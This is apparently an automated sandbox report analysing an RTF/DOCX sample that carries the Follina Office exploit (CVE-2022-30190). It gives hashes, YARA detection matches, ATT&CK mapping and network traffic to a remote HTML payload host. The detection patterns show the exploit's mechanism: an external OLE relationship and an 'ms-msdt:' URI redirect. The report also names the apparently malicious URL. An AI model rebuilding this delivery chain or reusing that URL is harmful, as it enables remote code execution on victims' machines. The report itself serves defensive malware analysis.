Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
20220531_180800.rtf

Overview

General Information

Sample Name:20220531_180800.rtf
Analysis ID:639039
MD5:7b9c8e08371550238fbcd7cee1c8087d
SHA1:ff8c9deb358b2d22aa086cf36406461e8e9978b2
SHA256:b93326f795459d836c277730058e9923ab5f9bfbcef32e1c951e4a0d7538f9f5
Infos:

Detection

Follina CVE-2022-30190
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Malicious sample detected (through community Yara rule)
Contains an external reference to another file
Detected suspicious Microsoft Office reference URL
Obfuscated document found, RTF is a DOCX
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1424 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
document.xml.relsSUSP_Doc_WordXMLRels_May22Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190Tobias Michalski, Christian Burkard, Wojciech Cie\305\233lak
  • 0x39:$a1: <Relationships
  • 0x3b9:$a2: TargetMode="External"
  • 0x3b1:$x1: .html!
document.xml.relsINDICATOR_OLE_RemoteTemplateDetects XML relations where an OLE object is refrencing an external target in dropper OOXML documentsditekSHen
  • 0x375:$olerel: relationships/oleObject
  • 0x38e:$target1: Target="http
  • 0x3b9:$mode: TargetMode="External
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
  • 0x2e2d:$re1: location.href = "ms-msdt:
sslproxydump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B293583.htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
    • 0x113c:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B293583.htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\th1s[1].htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
      • 0x113c:$re1: location.href = "ms-msdt:
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\th1s[1].htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0472FED.htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
        • 0x113c:$re1: location.href = "ms-msdt:
        Click to see the 1 entries
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        Exploits

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B293583.htm, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\th1s[1].htm, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0472FED.htm, type: DROPPED
        Source: document.xml.relsExtracted files from sample: https://cyberleague.co/th1s.html!
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.22:49172 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.22:49173 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.22:49174 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.22:49175 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.22:49179 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.22:49180 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.22:49181 version: TLS 1.0
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.22:49171 version: TLS 1.2
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 13.250.15.191:443
        Source: global trafficDNS query: name: cyberleague.co
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 13.250.15.191:443
        Source: global trafficHTTP traffic detected: GET /th1s.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: cyberleague.coConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /th1s.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: cyberleague.coIf-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMTIf-None-Match: "13e4-5e063d0e1ca1e"Connection: Keep-Alive
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
        Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.22:49172 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.22:49173 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.22:49174 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.22:49175 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.22:49179 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.22:49180 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.22:49181 version: TLS 1.0
        Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
        Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
        Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
        Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
        Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
        Source: ~WRF{529AA3F3-C7EA-493B-9EDD-4242ACBC44EE}.tmp.0.dr, ~WRS{3847A8D6-DBE6-42C6-982A-DFBC45D1EACD}.tmp.0.drString found in binary or memory: https://cyberleague.co/th1s.html
        Source: ~WRF{529AA3F3-C7EA-493B-9EDD-4242ACBC44EE}.tmp.0.drString found in binary or memory: https://cyberleague.co/th1s.htmlyX
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{058B4FD5-0265-42FA-A9A3-3C51BC43AA1B}.tmpJump to behavior
        Source: unknownDNS traffic detected: queries for: cyberleague.co
        Source: global trafficHTTP traffic detected: GET /th1s.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: cyberleague.coConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /th1s.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: cyberleague.coIf-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMTIf-None-Match: "13e4-5e063d0e1ca1e"Connection: Keep-Alive
        Source: unknownHTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.22:49171 version: TLS 1.2

        System Summary

        barindex
        Source: document.xml.rels, type: SAMPLEMatched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
        Source: sslproxydump.pcap, type: PCAPMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: document.xml.rels, type: SAMPLEMatched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cie\305\233lak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
        Source: document.xml.rels, type: SAMPLEMatched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B293583.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\th1s[1].htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0472FED.htm, type: DROPPEDMatched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: ~WRF{529AA3F3-C7EA-493B-9EDD-4242ACBC44EE}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: 20220531_180800.LNK.0.drLNK file: ..\..\..\..\..\Desktop\20220531_180800.rtf
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$220531_180800.rtfJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR515A.tmpJump to behavior
        Source: classification engineClassification label: mal68.expl.evad.winRTF@1/20@15/1
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: ~WRF{529AA3F3-C7EA-493B-9EDD-4242ACBC44EE}.tmp.0.drInitial sample: OLE indicators vbamacros = False

        Data Obfuscation

        barindex
        Source: 20220531_180800.rtfInitial file: Document starts with PK

        Persistence and Installation Behavior

        barindex
        Source: document.xml.relsExtracted files from sample: https://cyberleague.co/th1s.html!
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts13
        Exploitation for Client Execution
        Path InterceptionPath Interception11
        Masquerading
        OS Credential Dumping1
        File and Directory Discovery
        Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Obfuscated Files or Information
        LSASS Memory2
        System Information Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
        Non-Application Layer Protocol
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration13
        Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer2
        Ingress Tool Transfer
        SIM Card SwapCarrier Billing Fraud
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://cyberleague.co/th1s.htmlyX0%Avira URL Cloudsafe
        https://cyberleague.co/th1s.html0%Avira URL Cloudsafe
